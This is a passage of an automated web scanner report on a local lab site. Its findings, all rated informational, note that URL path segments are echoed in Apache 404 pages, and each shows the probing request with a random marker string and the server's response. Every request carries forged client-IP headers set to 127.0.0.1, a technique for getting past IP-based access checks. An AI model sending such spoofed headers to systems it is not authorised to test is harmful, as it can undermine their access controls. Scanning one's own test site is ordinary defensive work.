Date: Thu, 18 Oct 2018 21:03:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistezyl8ejmlgb/examplewebiste/includes was not found on this server.</p>
...[SNIP]...
19.68. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistej1sp4ewpsl/includes HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistej1sp4ewpsl/includes was not found on this server.</p>
...[SNIP]...
19.69. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistea1udhp44cp/examplewebiste/includes/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistea1udhp44cp/examplewebiste/includes/ was not found on this server.</p>
...[SNIP]...
19.70. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistetd991xdzgp/includes/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistetd991xdzgp/includes/ was not found on this server.</p>
...[SNIP]...
19.71. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includesy54br9jr6i/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includesy54br9jr6i/ was not found on this server.</p>
...[SNIP]...
19.72. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistevexrufuyh9/examplewebiste/includes/DBMS/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistevexrufuyh9/examplewebiste/includes/DBMS/ was not found on this server.</p>
...[SNIP]...
19.73. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistea4egtcc9zy/includes/DBMS/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistea4egtcc9zy/includes/DBMS/ was not found on this server.</p>
...[SNIP]...
19.74. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes26irb8uaj7/DBMS/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes26irb8uaj7/DBMS/ was not found on this server.</p>
...[SNIP]...
19.75. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMSr7cdj7wmwg/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMSr7cdj7wmwg/ was not found on this server.</p>
...[SNIP]...
19.76. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMS/mysql7id9ipus47 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMS/mysql7id9ipus47 was not found on this server.</p>
...[SNIP]...
19.77. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste3wga3hjnls/examplewebiste/includes/DBMS/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste3wga3hjnls/examplewebiste/includes/DBMS/mysql was not found on this server.</p>
...[SNIP]...
19.78. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste5d93g9t9uh/includes/DBMS/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste5d93g9t9uh/includes/DBMS/mysql was not found on this server.</p>
...[SNIP]...
19.79. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes3j1dsp87ir/DBMS/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes3j1dsp87ir/DBMS/mysql was not found on this server.</p>
...[SNIP]...
19.80. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMSayef1lzbpr/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMSayef1lzbpr/mysql was not found on this server.</p>
...[SNIP]...
19.81. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMS/pgsql5345g6jku0 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMS/pgsql5345g6jku0 was not found on this server.</p>
...[SNIP]...
19.82. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteeb81apeb1k/examplewebiste/includes/DBMS/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteeb81apeb1k/examplewebiste/includes/DBMS/pgsql was not found on this server.</p>
...[SNIP]...
19.83. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste2n39v2s7kw/includes/DBMS/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste2n39v2s7kw/includes/DBMS/pgsql was not found on this server.</p>
...[SNIP]...
19.84. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includest6445nrk1g/DBMS/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:48 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includest6445nrk1g/DBMS/pgsql was not found on this server.</p>
...[SNIP]...
19.85. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMSurrebe935j/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMSurrebe935j/pgsql was not found on this server.</p>
...[SNIP]...
19.86. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/dbmsmm2d7doycf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/dbmsmm2d7doycf was not found on this server.</p>
...[SNIP]...
19.87. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistexv0w27f2a9/examplewebiste/includes/dbms HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistexv0w27f2a9/examplewebiste/includes/dbms was not found on this server.</p>
...[SNIP]...
19.88. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteedgcecowv0/includes/dbms HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteedgcecowv0/includes/dbms was not found on this server.</p>
...[SNIP]...
19.89. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes49nsgpwt1u/dbms HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes49nsgpwt1u/dbms was not found on this server.</p>
...[SNIP]...
19.90. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/examplewebistepage.incm6j1qgemea HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/examplewebistepage.incm6j1qgemea was not found on this server.</p>
...[SNIP]...
19.91. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste34q51ys203/examplewebiste/includes/examplewebistepage.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
